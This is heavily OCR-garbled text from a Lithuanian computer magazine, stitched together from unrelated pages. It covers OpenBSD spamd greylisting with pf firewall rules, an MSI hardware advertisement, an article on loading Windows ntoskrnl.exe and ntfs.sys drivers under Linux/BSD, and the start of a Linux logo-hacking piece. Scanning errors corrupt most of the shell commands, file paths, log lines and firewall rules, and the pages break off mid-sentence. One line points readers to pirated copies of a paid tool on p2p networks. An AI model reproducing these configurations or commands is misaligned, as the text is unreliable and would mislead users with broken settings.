daugelio parametrų visumą daroma išvada apie kiekvieno 
konkretaus laiško „švarumą“. bei „pilkųjų sąrašų“ technologija 
(greylisting). Būtent apie pastarąją mes ir pašnekėsime kiek 
išsamiau, juk raštingai realizavus ir teisingai sukonfigūravus, ši 
technologija gali nufiltruoti iki 9896 spamo, negaišdama serverio 
laiko ir resursų „blogųjų“ laiškų tinklo srautui bei apdorojimui. 
Spamerio užduotis — per trumpiausią laiką išsiųsti didžiausią 
reklaminių laiškų kiekį. Tuo pačiu kiekvieno laiško išsiuntimo 
sėkmė nėra stebima. Viena pagrindinių to priežasčių 
elektroninio pašto pasaulyje išeinančios korespondencijos 
pristatymo patikimumas brangiai kainuoja, kitaip tariant: tam 
reikia specialių injektorių, wkdyti papildomus resursams imlius 
sisteminius iškvietimus, pavyzdžiui, fsync(2) ir write(2), bei 
atlikinėti operacijas su /var/spool/mgueue eile (arba užsiiminėti 
eilių migravimu). Taigi spamerių darbą galima apibūdinti kaip 
„Išsiunčiau ir pamiršau“ (fire and forget). Tuo mes ir 
pasinaudosime. 

Greylisting'o idėja labai paprasta: korektiškai sukonfigūruotas 
siuntėjo pašto serveris, gavęs tam tikrą atsakymą iš gavėjo 
serverio, laiško pristatymą privalo pakartoti po tam tikro laiko 
tarpo (paprastai po 5, 15, 25, 30 arba 60 minučių). Tai 
žinodami, vietoje atsakymo i susijungimą su nežinomu pašto 
serveriu mes su spamd grąžinsime ne standartinį SMTP 
pranešimą (OK arba Rejected), o laikiną klaidą (kurios kodas 
gali būti 450, 451 arba 550). Kuomet siuntėjo pašto serveris 
pakartos laiško pristatymą (remiantis RFC, jis tai privalo padaryti), 
mes įvertinsime, kad šis konkretus serveris prieš keletą minučių 
jau bandė mums išsiųsti laišką, o tai reiškia, kad jis nėra 
spameris. Tada mes priimsime korespondenciją. 


sparid dokumentacija 
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proto tep from <spand-uhitelis 
et proto tep from <apand-whitegroup 


port 


taisome ugniasienės taisyklės 


+ tail Aur/log/maillog 

Dec 1 01:55:53 jono-kompas sm-mta[21 632]: įpF9jgYVO21 432: 

= < pehosė?domein1.lt>, delay= 00:00:11, xdelsy = 0000-11, mail: =esmip, 
pri 30808, ielay  mail.domain!.lt. [81.211.11.22], dsn—4.3.0, stot Dalerred: 451 
Temporaiy faire, please It again later 


Pateiktame logo fragmėnte matyti, kad serveris mail.domain1.lt 
atmetė mūsų laišką, kurį mes siuntėme adresatui 
petras(Odomain1.lt. Jeigu mes žvilgtelėtume į šio serverio War 
log/daemon, tuomet pamatytume greylisting darbo rezultatus: 


+ tail /Aat/log/daemon 

Pec 1 01:56:19 mail spamd[8135]: 62.162243: canneded (I/O) 

Tac 1 01:56:80 mail spand[3135]- (GREY) 6216.22.33: < jonas domain2.lt> > 
< petros(eddomain1 > 

Dec 1 01:56:30 mail spomd[31 35]: 62.16.22.33- disconnaced after 11 seconds, 


Po to, po kurio laiko, mes pamatysime, kad siuntėjo serverio 
adresas — 62.16.22.3: įtrauktas į „baltąjį sąrašą“, 0 
pakartotinai pabandžius jį išsiųsti, jis bus tuojau pat ir be jokių 
problemų išsiųstas: 


+ plal -1 spomd-white T stow | giep 62.16.22.33 
6216.22.33 


Norėdami gauti visus šiuos gardumynus, įtrauksime spamd į 
konfigūracinį sistemos paleidimo skriptą. Nurodę žemiau 
pateiktus argumentus. mes galėsime išsamiau registruoti visus 
įvykius (*-v'), pasisveikinimo antraštę pakeisti į „Postfix“ (*-n') ir 
pervesti demoną į greylisting režimą (spamd grey=YES — '-£' 
analogas): 


vi /atlie.oont 

spamd: flags="-v 1 Postlix“ 
spamd grey — YES 

spamlogd Ilags="" 


as inet pr cp from to port 
it cp from ! <spamd-white> to port 
on inet proto tep from to port 


Greylisting režime spamd demonas 
elgsis standartiškai visiems adresams, 
kuriuos jis suras <spamd > lentelėje, 
o visiems likusiesiems jis veiks 
„pilkųjų sąrašų“ režimu. Šiame režime 
spamd, kaip nesunku numanyti, 
operuoja trimis reikšmėmis: siuntėjo 
serverio IP adresu, siuntėjo pašto 
adresu ir gavėjo pašto adresu. Jeigu 
gautas „trio“ sutinkamas pirmą kartą, 
mes gauname aukščiau parodytą 
situaciją ir įrašą /var/db/spamd 
lentelėje („pilkasis sąrašas*). Po tam 
tikro laiko — passtime (pagal 
nutylėjimą jis lygus 25 minutėms) — 
jeigu serveris gauna pakartotiną 
užklausą su savo bazėje jau 
užregistruotu „trio“, užklausa 
apdorojama, laiškas pristatomas, o 
siuntėjo serveris šį kartą įtraukiamas 
į „baltąjį sąrašą“, po ko visi laiškai 
iš šio serverio priimami be jokių 
užlaikymų. Tačiau jeigu iš šio pašto serverio laiškai ilgą laiką 
— whiteexp (pagal nutylėjimą 36 dienos) — nebuvo 
siunčiami, serveris iš „baltojo sąrašo“ pašalinamas, po ko 
jis vertinamas kaip „naujas“. Trečias laiko tarpas, kuriuo 
operuoja spamd — greyexp — tai laikas, kuri spamd laukia 
pakartotinio prisijungimo iš siuntėjo serverio, t.y. serverio 
buvimo laikas „pilkuosiuose sąrašuose“. Pagal nutylėjimą Jis 
yra 4 valandos. Sukonfigūruoti šiuos tris parametrus galima 
su spamlogd flags opcija „-G passtime:greyexp:whiteexp" 
(minutėmis). Beje, čia reikšmės pagal nutylėjimą 
sukonfigūruotos visai protingai, nebent galima sumažinti 
passtime: padaryti ne 25, 0 5 minutes. 

Į /etc/rc.conf bylą įtraukti pakeitimai įsigalios tik perkrovus 
sistemą. Jeigu dėl kokios nors priežasties serverio negalima 
perkrauti, įvykdyk šią komandų seką: 


+ eval /usy/libexa/spamd —ą —v =n Postlix 
1 Jus /likexed/spomd-setup 
+ /usi/libexed/spamlogd 


Konfiauracinės bylos pavyzdys 


[„Packet filter“: harmonijos paslaptis] Taigi spamo ir o ad net proto Icp fiom << spa 10 port snip 

kompanija yra visiškai pasirengę kovai, telieka paruošti 

Ugniasienės taisykles. * Spamerius siunčiam pas 
dr pass an Sex I inet proto tep from < spamd“> to port smtp 

cont 127.00.1 port spamd 

sąsajų |, rd pass on Sext if inet proto tap hom | < spamd-white > to 


port smtp <> 127.0.0.1 port spamd 


md“ 


tinklo 
hpO' 


elė, i kurią bus įroukiami chino ir koreo sekcijų IP adresai ", " Spamd laužia SMTP AUTH d 


persisi 


s saugosinė jų SMTP serverių IP adesus, kuie praėjo greylising patikininų */ 


spomd-while > persist 


" lokali žinomų SHTP serverių opij, kurie dėl savo darbo specifikos laiškų pakartotinai Ripli 


Iegendo: 
s/areylisting/schema/hitelist ip.tt */ Srojskto 


persis! file "/etc/mail/uhitelistt" 


im 
44.55 
b aukos 

Nederėtų nukreipinėi tų susijungimų, kuriuos inicijuoja draugiški SMTP savejii */ 285: koc d nd beia 

no tdr inet proto tep from <spamd- 10 port smip 


nas. 


B R NAŠUMAS UIMS|! 3 


MSI KSN Neo4-F MSI K8NGM-V NX7600GT-T2D256E 


+ NVIDIA nForce4 lustų rinkinys + NVIDIA GF 6100lustų rinkinys + 256MbDDR3 vaizdo atmkinties 

+ AMD Athlon64 FX/Athlon64, + AMD Athlon64 /Sempron, + 128Bit atminties magistralės plotis. 
CPU lizdo tipas Socket939 CPU lizdo tipas Socket 754 + DXDM jungtis 

+ Magistralės sparta: 1000 MHz + Magistralės sparta: 1600 MUS + HDTV palaikymas 

+ Atmintis 4 DDR 400, iki 4GB + Atmintis 2 DDR 400, iki 26B + OpenGL. 20 palaikymas. 

+ PC-Ex16 jungtis + PC-Ex16jungtis + DirectX 9.0 palaikymas 
7.1 kanalų garsas + 51 kanalų garsas 

+ Gbittinklas + 100 Mbittinklas 


MSI produktų ieškokite: 


Aureolės sprendimai, UAB Infociklas, UAB Komparsa, UAB 


Balco, UAB Inida, UAB Kompera, UAB 
Fortakas, UAB 156 Kompiuteriai, UAB Kompiuterinių sistemų centras, UAB 
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> 127.0.0.1 port smtp. 


/“ Užiikriname priėjimą prie mūsų pašto senerio "/ 

block in 

pass in log on Sex! II inet proto tap from any to Sext if 
port smip flags S/SA keep state 


[Patikriname būtinų sisteminių įrašų egzistavimą] Nepamiršk 
įsitikinti, kad sisteminėje byloje /etc/services yra pilnas mūsų 
konstrukcijoje dalyvaujančių servisų sąrašas: 


Š4 egiep "smtp | spam“ /etysemvices. 

smtp 25/tp Žž mail 

spamė 8025/trp > spamd(B) 

spamd-chą 8026/hcp > spamd(8) configuration 


Per didelį spamerių aktyvumą galima sustabdyti stebint 
maksimalų prisijungimų kieki (būk atidus, šiuo atveju spamd ir 
MTA randasi skirtinguose serveriuose): 


+ Vi /etdpl.cont 
at = "baO" 
smip senar = "192.1685.2" 


tūble <spommers > persist 


tdr on Sex! If inet proto tep from any to Sex if M 
port smip tog SPAM -> Ssmip sorvoi 


block In log guiek on Šext II inet from < spammeis > 

pass in log on Sex il tagged SPAM flags S/SA synpioxy state V 
(max-src-conn 100, moxsrc-conrrate 10/60, V 
overload <spammes > flush global) 


1 sudo prctl -sT 
Iblacklist 

linited 

passip 

Ispand 

Ispand-uhite 
Ispand-whitegroup 
Ispamd-whitelist 


Isshbf 
Itrusted Ž 
Iwifi 
814 sudo pfctl -t spamd -T show | wc -1 
536 
4)4 sudo pfctl -t spamd-white -T show | wc -1 
147 


1011 sudo pfctl -t spand-uhitegroup -T show | w€ -1 
4 

1111 sudo pfetl t spand-uhitelist -T show | wc -1 
51 

1214 spand rocks :-)B 


paskaičiuojame Įrašų klekį kiekvienoje lentelėje 


[Graudžios natos] Vardan teisingumo reikia paminėti, kad 
spamd iki idealo dar toloka. China ir korea sekcijos 
naudojamos vienu tikslu: minimizuoti sunaudojamos 
operatywinės atminties kiekį. Juk kai | susijungimų būsenų 
lentelę įtraukiami papildomi įrašai, branduolys ir spamd 
prisijungusiam serveriui dinaminiame režime pradeda išskirti 
atmintį. Be to, pati greylisting technologija lemia tam tikrą 
pradinį laiškų užlaikymą iš nežinomų pašto serverių. Mes šį 
užlaikymą galime minimizuoti su passtime opcija, tačiau 
daugeliu atvejų mums tenka pasikliauti protinga siuntėjų 
serverių konfigūracija. 10, 15 minučių — beveik visada 
toleruotinas laikas, tačiau jeigu pasitaikys toks serveris, kuris 
siuntimą atnaujina tik po vienos kitos valandos, tuomet čia 
jau nieko nepadarysi. Štai kodėl greylisting blogai dirba viešose 
pašto sistemose, kur būdingi nuolatiniai prisijungimai iš įvairių 
serverių, tačiau ši sistema puikiai veikia korporatyviniuose 
vidutinių ir nelabai didelių firmų pašto serveriuose, kurių 
darbuotojai susirašinėja su palyginus siauru partnerių ratu. 


[Fryškiniai post-skriptumai] Spamd yra perkeltas (portintas) 
į FreeBSD, jį galima įdiegti įprastiniu būdu — iš jungčių: 


+ dd /ust/parts/mail/spamd 
7 make instol! dean 


Savaime suprantama, tam, kad spamd veiktų FreeBSD 
sistemoje, čia turi būti aktyvuota OpenBSD PF galimybė: 


vi Jeidrecont 

pt enable="YES" 

pllog enable "VES" 

plspamd enable ="VES" 

plspamd Ilogs=“-6 5-4-864 4 V" 


Pora pastebėjimų. Visų pirma, greylisting mode veikimui būtinas 
failinių deskriptorių failų sistemos (fdescfs) palaikymas: 


7 echo "Idesdis /dav/id Idesds mw O 0" > > /etc/štab 
A acho Idosds |oad="1ES"" > > /booW/looder.conf 
46 kldlond fdescis 
2 mount /dev/id 


Antra, norint nepainioti OpenBSD spamd ir į SpamAssassin 
sudėtį įeinančio perl demono spamd, paleidimo skriptas 
pavadintas pispamd.sh. Tačiau to maža: FreeBSD paleidimo 
skriptų sistema apie proceso veikimą sprendžia pagal 
komandos ps pateikiamą informaciją. Ir jeigu sistemoje 
paleistas SpamAssassin'o spama, tuomet pfspamd.sh veiks 
nekorektiškai. Šis dviejų spamd demonų sambūvio sistemoje 
klausimas kol kas neišspręstas, todėl mums teks panaudoti 
mažytį haką: 


74 mv /ust/locallibexec/spamd /ust/local/libexot/pispamd 
+ vi /ust/ocal/etc/tc.d/pfspomd.sh 


/" Surandam ir pakeičiam eilvrę / 
command = "/usi/local/tibexec/plspamd" 
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Kovinis portinimo Menas 
Turbinis tvarkyklių perkėlimas iš 
„Windows“ į „Linux/BSD“ 

PRIES KELETĄ METŲ SITUACIJA SU TVAR- 
KYKLĖMIS LINUX IR BSD SISTEMOSE BU- 
VO TIESIOG KATASTROFIŠKA. JOS PRIPA- 
ŽINDAVO TIK NEDAUGELĮ ĮRANGINIŲ, TO- 
DĖL ĮRANGĄ UNIX MAŠINOMS TEKDAVO 
PIRKTI ATSKIRAI. TUOMET LINUX DAR NE- 
BUVO IŠAUGĘS IS HAKERIŲ „KONSTRUK- 
TORIAUS“ STADIJOS, O BSD DAUGIAUSIA 
BUVO NAUDOJAMA SERVERIUOSE, KURIŲ 
VISA ĮRANGA SUSIVESDAVO | TINKLO 
PLOKSTĘ IR SCSI VALDIKLĮ. IKI ŠIOL VIE- 
NAS PAGRINDINIŲ UNIX SISTEMŲ TRŪKU- 
MŲ YRA ĮVAIRIAUSIĖMS „SKANIEMS“ GE- 
LEZIUKAMS SKIRTŲ NORMALIŲ TVARKYK- 
LIŲ STOKA, SU KUO WINDOWS SKLAN DŽIAI 
SUSITVARKO. IŠ TIKRŲJŲ ŠĮ KLAUSIMĄ GA- 
LIMĄ IŠSPRĘSTI, APIE KĄ IR BUS KALBA- 
MA ŠIAME STRAIPSNYJE. 


[Virtualios mašinos] Prieš diegdamas Linux/BSD, su- 
simąstyk, kam tau, tiesą sakant, to reikia? Jeigu knieti 
pačiupinėti alternatyvią sistemą, perprasti programų kū- 
rimo priemones arba kompiliuoti išeities tekstus, tai ge- 
riausias pasirinkimas tokiu atveju būtų virtuali mašina, 
pavyzdžiui, VMWare. Tiesa, Fedora Core su ja žiauriai 
stabdo (su P-III 733 iš viso neįmanoma dirbti), tačiau 
Debian su KDE važiuoja visai normaliai. Nori -— kurk 
programas, nori — skaityk dokumentaciją. Taip pat gali 
pažaisti Star Wars tipo žaidimus. Tokiu atveju nereikės 
jokiu tvarkyklių, ta prasme, „jokių tvarkyklių be to, kas 
pateikiama kartu su bet kuriuo normaliu distributyvu“. 
Daugelis kūrėjų būtent taip ir daro. Kad ir kaip bežiūrė- 
tum, bet kuris save gerbiantis Unix programuotojas yra 
priverstas kompiuteryje turėti dešimtis skirtingų rūšių 
operacinių sistemų, kad galėtų testuoti savo programų 
suderinamumą. „Realiame“ kompiuteryje persijungimai 
tarp jų vyksta tik perkraunant, kas nėra gerai, o virtua- 
lios mašinos persijungia kaip karuselė. 

Galima pasielgti ir priešingai, t.y. kaip bazinę sistemą 
įdiegti Linux/BSD, o Windows paleisti su virtualia maši- 
na. Kadangi VMWare suteikia tiesioginį priėjimą prie 
COM/LPT/USB jungčių, prie tavo mašinos prijungtas ske- 
neris/spausdintuvas/skaitmeninis fotoaparatas jau ne- 
bus problema. Su tuo susidoros Windows! Tokiu atveju 


bazinė Unix mašina savo žinioje turi visus sisteminius resursus, 
todėl našumas čia nesumažėja, tačiau iškyla kitos problemos. 
Windows programos (pavyzdžiui, žaidimai) arba smarkiai stab- 
dys, arba iš viso atsisakys pasileisti, be to, su visais likusiais 
įrenginių tipais, pavyzdžiui, integruota WLAN plokšte arba vaiz- 
do plokšte, Windows dirbti negalės. O viskas todėl, kad VMWa- 
re yra uždara dėžė, kuri nuo bazinės operacinės sistemos atsi- 
riboja stora emuliatoriaus siena. Jeigu egzistuotų kokia nors 
galimybė virtualiai mašinai suteikti pilną priėjimą prie visos fizi- 
nės įrangos, tuomet būtų šaunu... Ruoškis! Būtent tokį būdą 
mes ir rengiamės aprašyti! 


[Du viename] Pradėsime nuo paprasto, tačiau iki šiol dar nie- 
kieno neišspręsto klausimo, t.y. jau seniai išspręsto, tačiau, 
žinoma, ne visai taip, kaip reikėtų. Visi žino, kad NTFS particijų 
galimybė kelia didelę problemą. | NTFS particijas mokančios 
rašyti tvarkyklės pasirodė visai neseniai, ir tai tik norint pasipui- 
kuoti parodose. Realiam darbui jos netinka, kadangi veikia ne- 
stabiliai ir turi daugybę apribojimų. Suspaustos (compressed) 
bylos, tranzakcijos ir daugybė kitų dalykų vis dar neįmanomi. Be 
to, NTFS nestovi vietoje ir nors lėtai, tačiau vis tiek tobulėja. 
Argi galima bent teoriškai sukurti 10096 suderinamą tvarkyklę, 
kuri naujas NTFS versijas „suvirškintų“ neįsikišant programuo- 
tojui? Klausimas nėra toks naivus, kaip atrodo. Kam mums 
vargti prie nuosavos tvarkyklės, kai po ranka yra jau paruošta 
ntfs.sys. Jeigu mes sugebėsime ją priversti veikti Linux sistemo- 
je, visos problemos išsispręs savaime. 

Taip, branduolio lygyje Linux/BSD nuo Windows skiriasi taip pat, 
kaip dramblys nuo krokodilo. Skirtumų labai daug, tačiau kaž- 
kas bendro jose vis dėlto yra. Tiek Windows, tiek Linux, tiek ir 
BSD veikia su x86 tipo procesoriais apsaugotame režime, nau- 
doja puslapiais suskirstytą virtualią atmintį ir sų įranga sąvei- 
kauja griežtai nustatyta tvarka (per fizinių ir virtualių magistralių 
hierarchiją). Aukšto lygio tvarkyklės, pavyzdžiui, ntis.sys, iš viso 
neliečia aparatūrinės įrangos ir jose nuo sistemos priklausan- 
čio kodo kiekis minimalus. Kodėl gi tuomet vienos sistemos 
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tvarkyklė neveikia kitoje sistemoje? Pagrinde taip yra todėl, kad 
sąsaja tarp operacinės sistemos ir tvarkyklės kiekvienu atveju 
skiriasi, bei todėl, kad tvarkyklė naudoja sistemos eksportuoja 
mų funkcijų biblioteką, o šios funkcijos skirtingose sistemose 
skiriasi. 

Perkelti Windows tvarkyklę į Linux/BSD visiškai realu! Tam net 
neprireiks jos išeities teksto. Tereikia parašyti gudrų ir nesudė. 
tingą „perėjimą“ tarp tvarkyklės ir operacinės sistemos, kuris 
priiminėtų užklausas ir transliuotų jas pagal visas „etiketo“ tai- 
sykles, taip pat reikia perkelti tvarkyklės veikimui reikalingų funk- 
cijų biblioteką. O, taip! Tam reikia mokėti programuoti! Papras- 
tiems mirtingiesiems vartotojams toks receptas Visiškai netin- 
ka, bet čia jau nieko nepadarysi. Nepaisant to, perkelti paruoš- 
tą tvarkyklę kur kas paprasčiau, nei perrašyti ją nuo nulio. Tokiu 
atveju bent jau nereikės kruopščiai disasembliuoti originalaus 
kodo, kas pakeistų techninės dokumentacijos paiešką (kurios 
arba Iš viso nėra, arba ji pateikiama tik pasirašius neplatinimo 
sutarti (non-disclosure agreement), kuri dažnai draudžia atvirai 
platinti išeities tekstus). Be to, išėjus naujai Windows tvarkyklės 
versijai, Linux/BSD jungties atnaujinimas iš esmės supaprastė- 
ja tiesiog naują bylą nukopijavai vietoje senos, ir viskas. Ta- 
čiau visa tai tik teorija. Pereikime prie detalių. 

Windows NT ir visų iš jos kilusių operacinių sistemų (Windows 
2000, XP. 2003) branduolio modelis ganėtinai paprastas. Su 
„išoriniu“ pasauliu branduolį susieja „Sisteminių servisų dis 
pečeris“, „prijungtas“ prie ntdli.dll. Ši biblioteka yra jau už bran 
dualio „kiauto“ ir vykdoma vartotojo režime. ntoskm!.exe įdieg- 
tas „Sisteminių servisų dispečeris“ remiasi „Iškviečiamomis 
branduolio sąsajomis“, dalis kurių realizuota paties ntoskrnl.exe 
viduje, o kita dalis — išorinėse tvarkyklėse, kurioms priklauso 
ir „Elektros maitinimo dispečeris“. Tam tikra tvarkyklių klasė 
kuri vadinasi failų sistemos „Įrenginių tvarkyklėmis“, yra savo- 
tiškame „kiaute“ ir su „Sisteminių iškvietimų dispečeriu“ są 
auja per įvedimo-išvedimo dispečerį, realizuotą 
ntoskrnl.exel 

Branduolys, ant kurio kaip ant pagrindo laikosi visi aukščiau 
paminėti komponentai, yra žemo lygio funkcijų visuma, sukon. 
centruotų... Teisingai! ntoskrni.exe byloje! Žemiau yra tik apa- 
ratūrinės įrangos abstrahavimo lygis, sutrumpintai vadinamas 
HAL (Hardware Abstraction Level). Kadaise „Microsoft“ turėjo 
idėją padalinti branduolį į nuo sistemos priklausomą ir nuo sis: 
temos nepriklausomą dalis, taip siekiant supaprastinti Windows 
perkėlimą į kitas platformas, tačiau dar NT 4.x laikais viskas 
susimaišė, ir didžioji nuo sistemos priklausomų funkcijų dalis 
pakliuvo į ntoskrnl.exe, o šiandien HAL praktiškai atsisakyta 
Jame liko nedaug iš tiesų žemo lygio funkcijų, kurios tiesiogiai 
sąveikauja su aparatūrine įranga, kitaip tariant su jungtimis 
ir DMA. Tačiau Linux/BSD branduolyje yra savos darbo su DMA 
funkcijos, todėl paskui save vilkti HAL mums visiškai nebūtina, 
Juo labiau kad tvarkyklės su DMA sąveikauja ne tiesiogiai, 0 per 
Plug-n-Pray menedžerį, kuris yra ntoskrni.exe. 

Jeigu mums pavyktų priversti ntoskrnl.exe veikti jam svetimo 
Linux (arba BSD) aplinkoje, gautume galimybę paleisti bet ko 
kias NT tvarkykles be jokių jų dvejetainio kodo papildymų. Tai ne 
tik supaprastintų perkėlimą, tačiau ir pašalintų taip vadinamų 
„autorinių teisių“ problemą. Integracija i Europa vyksta vis di 
desniu pagreičiu, Trečioji Roma (kitaip dar žinoma JAV vardu) 
veržiasi į mūsų žemes, visur nustatydama savo tvarką ir įstaty- 
mus. Bet kuris licencijuotos Windows kopijos savininkas turi teisę 
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paruoštą tvarkyklę leisti iš kur tik nor! be jokių leidimų Ir be 
papildomo mokesčio, tačiau modifikuoti dvejetainįi kodą jam 
vargu ar leidžiama. 

Bet mes ir nesiruošiame nieko modifikuoti! Mes imame pa- 
ruoštą ntoskrn!.exe ir... tiesą sakant, tai viskas. Darbo nera tiek 
jau daug. Pakanka ntoskml.exe suprojektuoti pagal PE bylos 
antraštėje nurodytus adresus (o ntoskrnl.exe — tai paprasčiau- 
sia PE byla) ir susidoroti su tvarkyklių naudojama eksporto len- 
tele. Kitaip tariant, mes turime realizuoti nuosavą PE užkroviklį 
ir įkelti jį į užkraunamą branduolio modulį (LXM) arba į patį 
branduolį. Kad nereikėtų kankintis, galima sriūbtelėti vyno ir iš 
ten pasiimti jau paruoštą užkroviklį. Ne, tai ne alkoholinis gėri- 
mas, tai Windows emuliatorius Wine (Windows Emulator). 

ntoskrnl.exe tarpusavio sąveika su Linux/BSD branduoliu vyks 
per pereinamąjį kodą, kuris emuliuos HAL. Šį kodą parašyti tu- 
rėsime mes patys, tačiau tame nėra nieko sudėtingo: darbo 
kiekis minimalus, kadangi HAL'e yra nedaug funkcijų, 0 ir tos 
paprastos kaip virdulys. Sudėtingiau „Sisteminių iškvietimų d 
pečerį“ subičiuliauti su išoriniu pasauliu, t.y. Linux/BSD pasau- 
liu. Pagrindinė problema čia tame, kad Dispečerio sąsaja nė 
karto nedokumentuota ir, be to, nuolat keičiasi. O po to „Micro: 
soft“ vėl sugalvos kokią nors kiaulystę, ir visas mūsų darbas 
nueis perniek. Dėl to tenka gudrauti ir paskui save vilkti ne tik 
ntoskmnl.exe, bet ir ntdll.dll. Kai kurie gali paklausti: kodėl? Kaip 
ntdll.dll susijusi su tvarkyklėmis ir branduoliu? Tvarkyklės jos 
neiškviečia, o ir pati ntall.dll yra viso labo perėjimų prie 
ntoskrnl.exe finkinys. 

Esmė tame, kad ntdll.dll sąsaja labai vargingai dokumentuota 
ir nesikeičia jau praktiškai daugelį metų, todėl ją galima drąsiai 
imti kaip pagrindą. Po to lieka viso labo susieti ntdll.dll su Linux 
BSD pasauliu, t.y. parašyti tvarkyklėms siunčiamų užklausų tran- 
sliatorių. Tai padaryti nėra paprasta, kadangi rašyti teks gana 
daug, šis darbas truks ne vieną dieną ir net ne vieną savaitę, 0 
papildomai įvertinus derinimą tam prireiks mažiausiai mėne 
sio. Tačiau darbas to vertas! 

Bent jau po to Linux/BSD sistemoje bus galima normaliai dirbti 
su NTFS ir kai kuriomis kitomis įvedimo/išvedimo tvarkyklėmis: 
Tiesa, su vaizdo plokštėmis viskas kur kas sudėtingiau, kadangi 
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Jos sąveikauja toli gražu ne su įvedimo-išvedimo dispečeriu (kuris 
yra ntoskrnl.exe viduje), 0 su win32 posisteme. Windows 2000 
sistemoje ji realizuota byloje win2k.sys. Nežinau, kaip tai įgy- 
vendinta kitose sistemose, tačiau tai ir nėra svarbu. win2k.sys 
tvarkyklė tik maža dalis to, ko reikia darbui, ir taip paprastai 
visa tai perkelti į Linux/BSD nepavyks. Po jos neišvengiamai eis 
visa jos aplinka, o parašyti tiek „aplinkų“ bus praktiškai nerealu. 
Be abejo, tai realu, tačiau kiek tai pareikalaus jėgų ir laiko? 
Perrašyti vaizdo tvarkyklę kur kas paprasčiau, jau nė nekalbant 
apie tai, kad tokiu atveju ji bus kur kas našesnė. Beje, NVIDIA ir 
ATI pastaruoju metu sėkmingai leidžia Linux/BSD sistemoms 
Skirtas populiariausių mikroschemų tvarkykles, todėl čia pro- 
blema pati išnyksta. 


ĮParuoštas realizacijos pavyzdys] Konkrečių tvarkyklių per- 
kėlimų Iš Windows pasaulio į Linux/BSD aš nežinau, tačiau at- 
rodo, kad yra kažkas panašaus skirto MS-DOS sistemai. Kal- 
bama apie Marko Rusinovičiaus. žymaus hakerio ir NT gelmių 
tyrinėtojo, projektą NTFS for MS-DOS. Nemokama versija 
(www.sysinternals.com/Utilities/NtfsDosProfessional.html) gali tik 
skaityti, o mokamą gali lengvai surasti bet kuriame p2p tinkle. 
Specialus įdiegimo vedlys prašo nurodyti kelią iki sisteminio Win- 
dows katalogo ir sukuria du diskelius, | kuriuos įnirtingai įrašo 
kažką stambaus. 

Pradėsime nuo pirmojo diskelio (kuris, beje, paprastai būna 
sisteminis). Čia tėra viena vykdoma byla ntfspro.exe, kuri yra 
užklausų transliatorius, susietas su Michael Tippach sukurtu ap- 
saugoto režimo praplėtimu WDOSX 0.96 DOS extender. 
Ntfs.gz — tai „gimtoji“ ntfs.sys tvarkyklė, paimta iš sisteminio 
Windows katalogo ir vietos taupymo sumetimais supakuota su 
archwatoriumi gzip. Išpakavimui mums prireiks arba Linux, ar- 
ba pkzip (Windows/MSDOS atvėju). Sulyginę ją su originalia tvar- 
kyklės byla, mes nematome jokių pasikeitimų! O ntoskml.gz 
tai sistemos branduolys (ntoskrnl.exe), kuris lygiai taip pat iš- 
trauktas iš Windows sistemos ir supakuotas. Jame nėra jokių 
pasikeitimų. 

Kitame diskelyje yra ntdll.gz (kurio kilmę nuspėti nėra sudėtin- 
ga) ir ntfschk.exe. Pastarasis yra pilnai perrašytas įrankis 
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chkdsk.exe. Norint konsolinę programa priversti dirbti MS-DOS 
sistemoje, tektų emuliuoti dar daugiau funkcijų, kas akivaiz- 
džiai nejėjo į Rusinovičiaus planus (nepaisant to, legendinis ha- 
keris Jurijus Haronas vis dėlto sukūrė praplėtimą, kuris leidžia 
plikame DOS'e paleisti Windows programas iš viso nesikreipiant 
į Windows! Viskas telpa į vieną diskelį — tiesiog grožybė! Patį 
praplėtimą galima parsisiųsti iš www.doswin32.com. Nekomer- 
ciniam naudojimui jis nemokamas). 

Diskeliuose taip pat yra bylos c 866.gz, autochk.gz, c 437.gz, 
c 1252.gz ir I intl.gz, kuriose saugoma kalbų atvaizdavimo in- 
formacija ir kiti tarnybiniai blizgučiai, be kurių galima ir apseiti. 
Esmė tame, kad NTFS for MS-DOS projekto branduolį sudaro 
Lys bylos: ntoskrni.exe, ntall.dll ir ntfs.sys, kurios sudėtos į sa- 
votišką ntfspro.exe bylos kiautą, kuri procesorių perveda | ap- 
saugotą režimą bei transliuoja MS-DOS užklausas į ntfs.sys 
suprantamą kalbą ir atvirkščiai. Kaip matai, tai veikia. Žinoma, 
Linux/BSD — tai toli gražu ne švarus MS-DOS. Branduolys sa- 
vaip paskirsto pertraukimus ir kitus sisteminius resursus, todėl 
rašant „kiautą-aplinką“ iškyla daugybė techninių problemų, ta- 
čiau visos jos išsprendžiamos. Analogiško sprendimo pavyzdį 
galima rasti kitame Marko Rusinovičiaus projekte NTFS for Win- 
dows 9x. Čia taip pat naudojamas „kiautas“, sukuriantis adek- 
vačią ntoskrnl.exe reikalingą aplinką ir užklausų transliatorių, 
tačiau šis įrankis veikia jau ne plikame MS--DOS, su kuriuo ir 
taip viskas aišku, o agresyvioje Windows 9x, kuri nuo NT skiriasi 
nė kiek ne mažiau, nei Linu/BSD. 


[Pabaiga] Taigi sukurti Linux/BSD sistemoms skirtą tvarkyklių 
„kiautą“ visai imanoma ir tame nėra nieko fantastiško. Jį pa- 
kanka sukurti vieną kartą, po ko bus galima paleidinėti skirtin- 
gas tvarkykles. Kodėl gi mums, hakeriams, nesusikooperavus ir 
tuo neužsiėmus? Pavyzdžiui, www.sourceforge.net svetainėje su- 
kurti naują projektą, surinkti grupę ir parodyti, ką sugebam, Juk 
tai tikrasis HAKERIAVIMAS, 0 ne nuobodus siautėjimas ir mąs- 
tymas! Tai ko gi mes laukiam? Važiuojam! 
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standartinį „Linux“ logotipą 

KAM NESINORĖJO PAHAKINTI LINUX BRAN- 
DUOLIO? KIEKVIENAS SAVE GERBIANTIS LI- 
NUKSOIDAS TURĖTŲ PABANDYTI TAI PADA- 
RYTI! JUK LINUX, PRIEŠINGAI NEI WIN- 
DOWS, YRA TIKRAS HAKERIAVIMO POLIGO- 
NAS, SAVYJE SLEPIANTIS NEĮTI KĖTINAS GA- 
LIMYBES. PAIMKIME KAD IR EKRANE PA- 
SIRODANTĮ LOGOTIPĄ. METAS JĮ PAKEISTI 
SAVO NUOŽIŪRA. 


[Intro] „Hakais“ (hacks) vadinamos įvairiausios gudrybės, idomūs 
dalykėliai ir originalūs veiksmai, o „hakeriavimas“ (hacking) tradi- 
ciškai reiškia programų nulaužimą arba tinklo atakas. Atrodytų, 
terminai panašūs, bet koks skirtumas! Šis straipsnis atvers publi- 
kacijų ciklą, pasakojantį apie tai, ką kieto galima padaryti su Linux 
